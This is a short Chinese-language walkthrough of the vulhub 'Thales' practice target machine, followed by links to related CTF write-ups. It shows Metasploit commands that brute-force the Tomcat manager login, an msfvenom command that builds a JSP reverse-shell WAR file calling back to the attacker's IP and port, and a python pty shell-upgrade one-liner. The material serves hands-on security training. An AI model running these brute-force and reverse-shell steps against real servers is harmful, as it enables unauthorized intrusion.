vulhub-Thales靶机练习

1.安装靶机

可以看到没有IP地址,所以我们得通过kali扫出我们的IP地址

2.IP扫描

可以根据我们的MAC地址来判断除我们的靶机IP,同时我们可以看到开放了22和8080端口

3.端口访问

首先我们访问一下8080端口

点击host manager,给我们弹出一个登录界面

4.漏洞查找

这时我们可以利用msf来爆破一下,首先我们先启动一下msf

复制代码
msfconsole

然后我们查找一下tomcat可以利用的东西

复制代码
search tomcat login

接下来我们利用这个来进行爆破,这里已经给了我们怎么使用的语句

复制代码
use 0

输入我们要爆破的IP地址

复制代码
set rhosts 172.16.2.5
run

成功获得我们的账号密码

然后去登录一下,登录到我们的管理员系统

在应用程序列表的位置我们找到了上传文件的地方,这里我们可以上传一个反弹shell的文件

利用kali生成一个反弹shell的war文件

复制代码
msfvenom  -p java/jsp_shell_reverse_tcp LHOST=172.16.2.61 LPORT=8888 -f war -o shell.war //kali的地址以及端口

上传我们的shell文件并开启监听

可以看到反弹shell成功,可以升级一下变成可交互的页面

复制代码
python3 -c "import pty;pty.spawn('/bin/bash')"
相关推荐
青岑CTF21 小时前
攻防世界-Ics-05-胎教版wp
开发语言·安全·web安全·网络安全·php
合才科技1 天前
【要闻周报】网络安全与数据合规 2-1
安全·web安全
one____dream1 天前
【网安】Reverse-非常规题目
linux·python·安全·网络安全·ctf
雨季6661 天前
Flutter 三端应用实战:OpenHarmony “专注时光盒”——在碎片洪流中守护心流的数字容器
开发语言·前端·安全·flutter·交互
青岑CTF1 天前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
数说星榆1811 天前
模型安全防御:对抗攻击与数据投毒的防护
安全
188号安全攻城狮1 天前
【PWN】HappyNewYearCTF_9_ret2syscall
linux·汇编·安全·网络安全·系统安全
知识即是力量ol1 天前
深度解析:基于 JWT + Redis 白名单的双令牌高安全认证架构
redis·安全·架构
HaiLang_IT1 天前
网络安全与执法专业【精选选题表】优质选题参考
安全·web安全·php
青岑CTF1 天前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全